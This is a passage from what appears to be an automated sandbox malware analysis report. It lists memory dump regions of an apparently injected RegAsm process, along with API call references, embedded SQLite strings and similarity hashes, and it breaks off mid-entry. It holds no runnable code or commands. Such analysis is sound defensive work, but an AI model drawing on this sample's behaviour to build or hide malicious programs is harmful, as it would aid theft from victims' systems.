                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
                                              • API String ID: 0-3026403748
                                              • Opcode ID: 9a8a694cdbfa75f9d67a58c6ed6041b98b5a30045ce7206028a7e6d51901f394
                                              • Instruction ID: 6182271fbaf6791a153213d57eac96eb44ae931f50a678d35c1c4b9b1c90ee69
                                              • Opcode Fuzzy Hash: 9a8a694cdbfa75f9d67a58c6ed6041b98b5a30045ce7206028a7e6d51901f394
                                              • Instruction Fuzzy Hash: 29F021B6C04381ABEA225A18AC81EFF36E5AFD5B01F06082CF88A61200D325F950C777
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FC40D37D,?,?,00000000,1B88D1CB,000000FF,?,1B835B30,?,?,1B835ADF,?), ref: 1B835BF6
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1B835C08
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,1B88D1CB,000000FF,?,1B835B30,?,?,1B835ADF,?), ref: 1B835C2A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: ddcce97d8833dcaaba34972ed9b06de12b8149ccda2cedd933bc76f8ee5cb915
                                              • Instruction ID: e1ba17db4cf3df5e0bc755d1a9bce5f805d9db622622aff9c77c00299eae7a39
                                              • Opcode Fuzzy Hash: ddcce97d8833dcaaba34972ed9b06de12b8149ccda2cedd933bc76f8ee5cb915
                                              • Instruction Fuzzy Hash: AE01627595456AEFDB059F90CD44BEEB7B8FB04F15F000A25E812A3290DB78D905CBA0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d1013a7452b45f4713b043c6485fcee707689c2313245e20e693f89c5666af4
                                              • Instruction ID: 231fd7cc6dfcba2c5aae6aa4f9168c7dde0ba40a1b308d562418f5cd29ca0f45
                                              • Opcode Fuzzy Hash: 0d1013a7452b45f4713b043c6485fcee707689c2313245e20e693f89c5666af4
                                              • Instruction Fuzzy Hash: C9028EB0944316CFD784DF25D884B9AB7E4FF84B04F08462EF98997281E774E958CB92
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00411E43
                                              • memset.MSVCRT ref: 00411E65
                                                • Part of subcall function 00411A94: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411E92,00000000), ref: 00411A9F
                                                • Part of subcall function 00411A94: HeapAlloc.KERNEL32(00000000,?,00411E92,00000000), ref: 00411AA6
                                                • Part of subcall function 00411A94: wsprintfW.USER32 ref: 00411AB7
                                              • OpenProcess.KERNEL32(00001001,00000000,?,?,?), ref: 00411EEC
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00411EFA
                                              • CloseHandle.KERNEL32(00000000,?,?), ref: 00411F01
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 1628159694-0
                                              • Opcode ID: bb9b71f5e8ec4893d67d55fbca70c56ba30c3264256f5443c6f3ee74202b9b1e
                                              • Instruction ID: 08aea404dcaa057e0e9199cf42e56a70b86344994b490b13035dd86d77b496de
                                              • Opcode Fuzzy Hash: bb9b71f5e8ec4893d67d55fbca70c56ba30c3264256f5443c6f3ee74202b9b1e
                                              • Instruction Fuzzy Hash: FA318072901119ABCB11DFD0CD899EFBB79FF06750F100016F606E6150D7749AC5CBA4
                                              APIs
                                              • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CAD
                                              • lstrcpyn.KERNEL32(00640760,?,00000000,00000104,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CC6
                                              • lstrlenA.KERNEL32(00000104,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CD8
                                              • wsprintfA.USER32 ref: 00411CEA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: %s%s
                                              • API String ID: 1206339513-3252725368
                                              • Opcode ID: 862e4cb0178fb9b4318c1bf297c52207944604ea184238de445fed15d001e561
                                              • Instruction ID: 43e2d6013c2e768f3f20f039ab6d4513d7afba91ea69d68aaf08fbe0e5f3b357
                                              • Opcode Fuzzy Hash: 862e4cb0178fb9b4318c1bf297c52207944604ea184238de445fed15d001e561
                                              • Instruction Fuzzy Hash: 08F0E93620022A7BDB111F999C489DBBF2EEF47669B041022FE0993210CB716954C7E5
                                              APIs
                                              • __getptd.LIBCMT ref: 0041B6AD
                                                • Part of subcall function 0041B884: __getptd_noexit.LIBCMT ref: 0041B887
                                                • Part of subcall function 0041B884: __amsg_exit.LIBCMT ref: 0041B894
                                              • __getptd.LIBCMT ref: 0041B6C4
                                              • __amsg_exit.LIBCMT ref: 0041B6D2
                                              • __lock.LIBCMT ref: 0041B6E2
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041B6F6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: c9dfcfac7ca24222d80135a14f2d32765b75e3e7d016271b71d0ec5a4033ef82
                                              • Instruction ID: ef5dc52e7bd3271d847fd346537f8277cf7d4a2d41aa3a0692d6f4c3dc8a43a5
                                              • Opcode Fuzzy Hash: c9dfcfac7ca24222d80135a14f2d32765b75e3e7d016271b71d0ec5a4033ef82
                                              • Instruction Fuzzy Hash: DEF0C232A416109BDA20BB665803BCD33A0DF10768F64411FE050562D2CB2C49C18ACF
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004083D8
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • lstrlenA.KERNEL32(00000000), ref: 00408927
                                              • lstrlenA.KERNEL32(00000000), ref: 0040893B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
                                                • Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
                                                • Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
                                                • Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                              • String ID: #
                                              • API String ID: 3207582090-1885708031
                                              • Opcode ID: effc8aafcbed3aab504db3f9686c6cb41f7a7435c66cf4a857e419bc47173295
                                              • Instruction ID: 0541987f1afd671b4e9ef34776029e6948f514961841807f53cc92496833b1ce
                                              • Opcode Fuzzy Hash: effc8aafcbed3aab504db3f9686c6cb41f7a7435c66cf4a857e419bc47173295
                                              • Instruction Fuzzy Hash: BA124E7180514DEEDB09EBE5C956BEEBB74AF14308F10419EE052621C2DFB827C8DBA5
                                              Strings
                                              • fts5: syntax error near "%.*s", xrefs: 1B7A751C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fts5: syntax error near "%.*s"
                                              • API String ID: 0-498961494
                                              • Opcode ID: ce2d7da8638c60cbf7f6a73d5a298baef9de6528a5bf43527cf4c35e6f7bb181
                                              • Instruction ID: 2fb6bcd32c4d95dfc34d1fea6854fb4342b61c45ff8cc68c17e1ce4a17458608
                                              • Opcode Fuzzy Hash: ce2d7da8638c60cbf7f6a73d5a298baef9de6528a5bf43527cf4c35e6f7bb181
                                              • Instruction Fuzzy Hash: 5CB1B1B09443529FD794CF34C884B9AFBE8BF44708F484A1EF89A87240D775E585CB96
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C1459
                                              • %s at line %d of [%.10s], xrefs: 1B6C1468
                                              • database corruption, xrefs: 1B6C1463
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 1b49c94be2be2615470ac84659f4a9f2f69cb07c280b81b9e353a50766909ff5
                                              • Instruction ID: d477570f3dd07983055ea448906acb8c23318b39f378dedb179f2b9ce0821a37
                                              • Opcode Fuzzy Hash: 1b49c94be2be2615470ac84659f4a9f2f69cb07c280b81b9e353a50766909ff5
                                              • Instruction Fuzzy Hash: 417103F6A04301DFC705CF25C881AD7BBE5EF98214F158999F8899B342D730E945CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: winShmMap1$winShmMap2$winShmMap3
                                              • API String ID: 0-3826999013
                                              • Opcode ID: 88109be1829fea503c530448d6ffb5e8508f436d173bcaf17668c4958522dcc0
                                              • Instruction ID: 1eccab698c73dc96dc4227f5db56642b77e681480ea63858a56e70b14d8a47fe
                                              • Opcode Fuzzy Hash: 88109be1829fea503c530448d6ffb5e8508f436d173bcaf17668c4958522dcc0
                                              • Instruction Fuzzy Hash: 6C61E2B55007029FDB14CF25EC85BA7B7E5EF94B04F01486DF98AA7291DB38E809CB52
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C3092
                                              • %s at line %d of [%.10s], xrefs: 1B6C30A1
                                              • database corruption, xrefs: 1B6C309C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 981d66ea50b94ce95eebff1c1e7692ff056b99039533b363157978daf947f9fc
                                              • Instruction ID: 049b9f68f033e5a292a8c17291a57e8041ebba40ba5b7d1f50c1fac8506c86a6
                                              • Opcode Fuzzy Hash: 981d66ea50b94ce95eebff1c1e7692ff056b99039533b363157978daf947f9fc
                                              • Instruction Fuzzy Hash: 0C61A3B59043059FCB04DF68C881AABBBE4FF98704F40495DF98997341E735EA45CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (join-%u)$(subquery-%u)
                                              • API String ID: 0-2916047017
                                              • Opcode ID: 4461562069c7031df0c6923a95e0d83e9ff4734ce87fb8a56b554a6f8c40112d
                                              • Instruction ID: 9e8cf8668d9491616a2c1e9c5cce441e58f202d28a2dca3245533f0c0e9ff104
                                              • Opcode Fuzzy Hash: 4461562069c7031df0c6923a95e0d83e9ff4734ce87fb8a56b554a6f8c40112d
                                              • Instruction Fuzzy Hash: 3151F4F5A04341DBCF18CF24D885AABB7A1AFB5704F08895DFC9A5B205D731E801CBA1
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C35EA
                                              • %s at line %d of [%.10s], xrefs: 1B6C35F9
                                              • misuse, xrefs: 1B6C35F4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3564305576
                                              • Opcode ID: dc236a126485f08d86e4c28110e65b6d50574dca7cb99f04bbae3ad1e7bfa1fb
                                              • Instruction ID: a076d649b5346701da813c7f1d395081dad2b0533957b2fd05ad42b0c824d5ab
